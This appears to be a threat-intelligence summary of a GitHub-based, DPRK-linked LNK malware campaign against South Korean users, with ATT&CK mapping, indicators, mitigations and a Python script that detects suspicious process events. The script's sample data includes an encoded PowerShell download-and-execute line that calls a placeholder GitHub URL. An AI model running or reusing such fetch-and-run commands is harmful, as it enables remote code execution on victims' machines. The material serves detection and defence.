Full Report
A series of malicious LNK files targeting users in South Korea has been detected using a multi-stage attack chain that uses GitHub as command and control (C2) infrastructure. The campaign relies on scripting, encoded payloads and legitimate Windows tools to maintain persistence while avoiding detection. Earlier versions of the attack date back to 2024 but…
Analysis Summary
# Tool/Technique: GitHub-Based Multi-Stage LNK Campaign
## Overview
This entry describes a sophisticated multi-stage attack chain targeting South Korean users. The threat involves the use of malicious Windows Shortcut (LNK) files that initiate a series of scripts to download payloads and establish a covert command-and-control (C2) channel utilizing legitimate GitHub repositories.
## Technical Details
- **Type**: Malware / Multi-stage Infection Chain
- **Platform**: Windows
- **Capabilities**: Script execution, payload encoding/obfuscation, persistence, and C2 communication via GitHub.
- **First Seen**: Earlier variants detected in 2024; updated versions observed in April 2026.
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1566 - Phishing] (Likely delivery mechanism for LNK files)
- **[TA0002 - Execution]**
  - [T1204.001 - User Execution: Malicious Link]
  - [T1059.005 - Command and Scripting Interpreter: Visual Basic]
  - [T1059.001 - Command and Scripting Interpreter: PowerShell]
- **[TA0003 - Persistence]**
  - [T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder]
- **[TA0005 - Defense Evasion]**
  - [T1132.001 - Data Encoding: Standard Encoding] (Base64/hex encoding of payloads)
  - [T1218 - System Binary Proxy Execution] (Living-off-the-Land Binaries)
  - [T1027 - Obfuscated Files or Information]
- **[TA0011 - Command and Control]**
  - [T1102.002 - Web Service: Bidirectional Communication] (Abusing GitHub as C2)
## Functionality
### Core Capabilities
- **Scripting Orchestration**: Uses Windows LNK files to trigger secondary scripts (VBScript/PowerShell).
- **Encoded Payload Handling**: Decodes and executes various stages of the attack from obfuscated scripts to avoid string-based detection.
- **Living-off-the-Land (LotL)**: Utilizes legitimate Windows tools to download and execute malicious code, minimizing the footprint on the disk.
### Advanced Features
- **GitHub as C2**: Instead of traditional domains, the malware communicates with GitHub repositories to fetch commands or upload stolen data, making the traffic appear legitimate and bypassing many firewall restrictions.
- **Evolving Obfuscation**: Modern versions have removed metadata found in 2024 samples and implemented more complex obfuscation to hinder researcher analysis.
## Indicators of Compromise
*Note: Specific hashes were not provided in the summary article; consult the referenced Fortinet advisory for full lists.*
- **File Names**: Malicious LNK files (often masquerading as legitimate documents in South Korean contexts).
- **Network Indicators**:
  - `github[.]com/[account_name]/[repo_name]` (Covert channel)
  - `raw.githubusercontent[.]com/...`
- **Behavioral Indicators**:
  - `cmd.exe` or `powershell.exe` spawned directly from an `.lnk` file execution.
  - Outbound connections to GitHub from non-developer applications.
## Associated Threat Actors
- **North Korean Nexus (DPRK)**: Per Fortinet's advisory, this campaign is linked to DPRK-related cyber activities targeting South Korean interests.
## Detection Methods
- **Behavioral Detection**: Monitor for `.lnk` files that launch `cmd.exe`, `powershell.exe`, or `mshta.exe` with suspicious command-line arguments (e.g., encoded strings or URLs).
- **Network Monitoring**: Identify anomalous traffic to GitHub; specifically, look for repetitive requests to particular README or Issues pages where C2 commands might be hosted.
- **Endpoint Detection**: Audit the creation of scripts in `%TEMP%` or `%APPDATA%` folders following the opening of a downloaded shortcut.
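As an added example (not code from the report or from Fortinet's advisory), the following Python scores constructed Sysmon-style process-creation events against the behaviours listed above: a script host spawned by `explorer.exe` (how a double-clicked `.lnk` is launched), an encoded PowerShell command, and a GitHub URL in the plain or decoded command line. The process-name set, the regular expressions, the two-indicator threshold and the placeholder repository path are assumptions.

```python
import base64
import re

# Script hosts the report names as LNK hand-off targets (cmd, powershell, mshta) plus
# the other common Windows script interpreters; assumed list, not from the advisory.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
GITHUB_RE = re.compile(r"github\.com|raw\.githubusercontent\.com|gist\.github", re.I)
# PowerShell -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE); '' if absent."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError: not valid base64
        return ""

def classify(event):
    """Return the reasons an event matches the LNK -> script host -> GitHub chain."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return []
    reasons = []
    if parent == "explorer.exe":  # a double-clicked .lnk is launched by the shell
        reasons.append("script host spawned by explorer.exe")
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded:
        reasons.append("encoded PowerShell command")
    if GITHUB_RE.search(event["CommandLine"]) or GITHUB_RE.search(decoded):
        reasons.append("GitHub URL in (decoded) command line")
    return reasons

def is_suspicious(event):
    """Require two independent indicators; any single one is common in benign activity."""
    return len(classify(event)) >= 2

def scan(events):
    return [(e["ProcessId"], classify(e)) for e in events if is_suspicious(e)]

# Constructed sample events in Sysmon Event ID 1 shape; repository paths are placeholders.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ACCOUNT-PLACEHOLDER/REPO-PLACEHOLDER/main/stage2.txt')"
SAMPLE_EVENTS = [
    {"ProcessId": 4212, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -enc "
                    + base64.b64encode(_STAGE2.encode("utf-16-le")).decode()},
    {"ProcessId": 4300, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
    {"ProcessId": 4388, "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh.exe -c git clone https://github.com/ACCOUNT-PLACEHOLDER/tool.git"},
]
```

Only the first sample event crosses the threshold; the plain `cmd.exe` from Explorer and the developer's `pwsh.exe` reaching GitHub each carry a single indicator and are left alone.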
## Mitigation Strategies
- **User Education**: Train users to identify suspicious shortcut files and avoid clicking on unexpected attachments.
- **File Association**: Restrict or monitor the execution of LNK files from untrusted zones (e.g., browser downloads or email attachments).
- **Network Filtering**: Implement SSL inspection to monitor GitHub traffic for non-standard usage or suspicious repository paths.
- **AppLocker/WDAC**: Implement application whitelisting to prevent unauthorized scripts or binaries from executing.
## Related Tools/Techniques
- **Gist-based C2**: Similar to GitHub repo C2, utilizing GitHub Gists for payload hosting.
- **Living-off-the-Land (LotL)**: Common technique used by North Korean actors like Lazarus or Kimsuky.